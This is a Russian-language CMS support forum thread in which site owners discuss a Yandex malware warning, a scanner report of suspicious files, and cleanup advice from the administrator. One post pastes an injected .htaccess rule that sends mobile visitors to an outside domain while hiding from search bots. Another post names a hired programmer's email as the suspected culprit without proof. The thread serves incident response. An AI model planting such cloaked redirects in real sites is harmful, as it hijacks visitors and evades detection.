Добрый вечер, Гость! Представляем Вам наши форумы. Вы можете зарегистрироваться чтобы писать на форумах или зайдите под своим именем, если Вы уже регистрировались.
   
   


Форум
 CMS Status-X | Техническая помощь
         Вредоносный код

Похожие темы  |  Печать страницы

Вредоносный код


События Суббота, 01.06.2013, 17:56

Игорь Вишневский

Группа: Пользователь
Ранг: Новичок
Cообщений: 25
Регистрация: 20.01.2013
Город: Краснодар
Вредоносный код
Здравствуйте!

Получено письмо от "Яндекс.Вебмастер"

"На страницах вашего сайта dom-dizayna.ru обнаружен код, который может быть опасен для посетителей. ...
... сайт выводится в результатах поиска с пометкой «Этот сайт может угрожать безопасности вашего компьютера». ..."


Проверка встроенным антивирусом Status-X
===========
Подозрительные файлы

/lib/editor/ckeditor.js <iframe 74 2462
/lib/editor/ckeditor.js <iframe 100 1815
/lib/editor/ckeditor.js <iframe 113 117
/lib/editor/ckeditor.js <iframe 143 1053
/lib/editor/ckeditor.js <iframe 147 678
/lib/editor/ckeditor.js <iframe 151 2095
/class/class.LinkfeedClient.php LINKFEED_USER 106 22
/class/class.LinkfeedClient.php LINKFEED_USER 107 48
/class/class.LinkfeedClient.php LINKFEED_USER 139 26
/class/class.LinkfeedClient.php __linkfeed_robots__ 187 64
/class/class.LinkfeedClient.php __linkfeed_robots__ 192 35
/class/class.LinkfeedClient.php __linkfeed_robots__ 192 112
/class/class.LinkfeedClient.php __linkfeed_robots__ 238 64
/lang/en/admin.txt system( 1002 25
/lang/de/admin.txt system( 965 24
/lang/de/main.txt system( 374 25
/admin/class/class.AdminSettings.php <iframe 660 90
/jquery.js
===========

На сколько это опасно, как это исправить?

Пользователь офлайн
События Суббота, 01.06.2013, 20:12

Status-X

Группа: Администратор
Cообщений: 3005
Регистрация: 23.10.2009
Город: Санкт-Петербург
По поводу последнего пункта не помню, все остальные это исключение, на форуме писалось.
Ищите дальше, я у вас ничего не нашел на сайте, в коде чисто


Пользователь офлайн
События Среда, 10.07.2013, 00:02

Kalyda

Группа: Пользователь
Ранг: Новичок
Cообщений: 33
Регистрация: 27.10.2009
Город: Москва
Тоже получил предупреждение от Яши по поводу мобильного редиректа , по факту проверки в корневом htaccess( CHMOD 644) появилось
PHP-код
RewriteCond %{HTTP_USER_AGENT} (android|midp|j2me|symbian|series 60|symbos|windows mobile|windows ce|ppc|smartphone|blackberry|mtk|windows phone|iemobile|nokia|ucweb|ucbrowser|iPad|iPhone) [NC]
RewriteCond %{HTTP_USER_AGENT} !(bot|ia_archiver|crawler|slurp|validator|webalta|yahoo|yandex|google|curl|wget) [NC]
RewriteRule (.*) [URL]http://m.extrasoftware.biz/?29&source=BLA_BLA_BLA.ru [L,R=302] # on

Есть идеи каким макаром это могло случиться? версия 1.04

Отредактировано Kalyda: 10.07.2013, 00:04:57


Люди в основе своей очень добрые ......только напоминать им об этом скоро будет некому
Пользователь офлайн
События Среда, 10.07.2013, 00:05

Status-X

Группа: Администратор
Cообщений: 3005
Регистрация: 23.10.2009
Город: Санкт-Петербург
Меняйте пароли на фтп, и листайте логи.
Да и есть система защиты файлов, если бы использовали ее, то получили бы оповещение о том что файл изменили.
И работает она гораздо лучше рекламируемого айболита
Вот блин каждому нужно говорить об этих мелочах.


Пользователь офлайн
События Среда, 10.07.2013, 00:13

Status-X

Группа: Администратор
Cообщений: 3005
Регистрация: 23.10.2009
Город: Санкт-Петербург
За сигнатуру спасибо, ща добавлю в базу


Пользователь офлайн
События Среда, 10.07.2013, 00:23

Игорь Вишневский

Автор текущей темы
Группа: Пользователь
Ранг: Новичок
Cообщений: 25
Регистрация: 20.01.2013
Город: Краснодар
Да-да, Яша ругался на редирект для мобильных устройств, а хостер мне прислал результаты проверки - именно этот код и был в файлах htaccess.
У меня работал и имел полный доступ некий Артём (Украина) вот его мыло artvict.investor@gmail.com. Может и увас он работал?
Я убрал этот код из всех файлов htaccess (у меня там несколько сайтов и код был не во всех). Прошло уже две недели - код не появляется, Яша спокоен - значит вредных скриптов нет и код был внесён вручную. Кроме меня и наёмного программера там никого не было - вывод ясен.
Пользователь офлайн
События Среда, 10.07.2013, 00:30

Status-X

Группа: Администратор
Cообщений: 3005
Регистрация: 23.10.2009
Город: Санкт-Петербург
База антивируса обновлена, всем рекомендуется нажать кнопку обновления и провериться.


Пользователь офлайн
События Среда, 10.07.2013, 00:38

Игорь Вишневский

Автор текущей темы
Группа: Пользователь
Ранг: Новичок
Cообщений: 25
Регистрация: 20.01.2013
Город: Краснодар
Цитата
Автор: Status-X
База антивируса обновлена, всем рекомендуется нажать кнопку обновления и провериться.


Кстати, сайт для редиректа у меня был другой. И в принципе - может быть любой.
Пользователь офлайн
События Среда, 10.07.2013, 00:45

Status-X

Группа: Администратор
Cообщений: 3005
Регистрация: 23.10.2009
Город: Санкт-Петербург
Да тут в общем то дело не в сигнатуре, а просто в обычной лени, сделать при заливке сайта снимок системы, когда она чистаРжу нимагу А дальше забил и все, а вот если файлы поменяются, то придет письмо, люди предохраняйтесьРжу нимагу


Пользователь офлайн
События Среда, 10.07.2013, 00:55

Игорь Вишневский

Автор текущей темы
Группа: Пользователь
Ранг: Новичок
Cообщений: 25
Регистрация: 20.01.2013
Город: Краснодар
Цитата
Автор: Status-X
Да тут в общем то дело не в сигнатуре, а просто в обычной лени, сделать при заливке сайта снимок системы, когда она чистаРжу нимагу А дальше забил и все, а вот если файлы поменяются, то придет письмо, люди предохраняйтесьРжу нимагу


Нет возражений! В Status-X не мало вариантов предохранятся. Но у меня несколько сайтов на этом хостинге, из них только один на Status-X. А доступ - общий ко всем, через cPanel. Ни кто не застрахован от недобросовестного наёмника, или сотрудника, или даже напарника. Во всяком случае - предохраняться нужно, факт бесспорный и в Status-X есть всё необходимое для этого.
Пользователь офлайн


Похожие темы  |  Печать страницы  |   Предыдущая тема  |   Следующая тема

Быстрый переход:  
 

 Сейчас на сайте


Пользователей: 0, Гостей: 3

Поисковые боты: 15
Googlebot(4), MJ12bot, Yandex(3), BingBot(2), Baidu.com(2), Inktomi Slurp, Unknown Bot(2)

 Статистика форума


  Темы Сообщения Пользователи
За сутки:
За неделю:
За месяц:
Всего:
Мы приветствуем нового участника: somik

 Дни рождения


maks.bakal (35), FREEmax (24), anya.krasovskaya (21), samson (14)
Печать | Copyright © 2009 - 2016 Status-X All rights reserved | Powered by CMS Status-X 1.05 | Контакты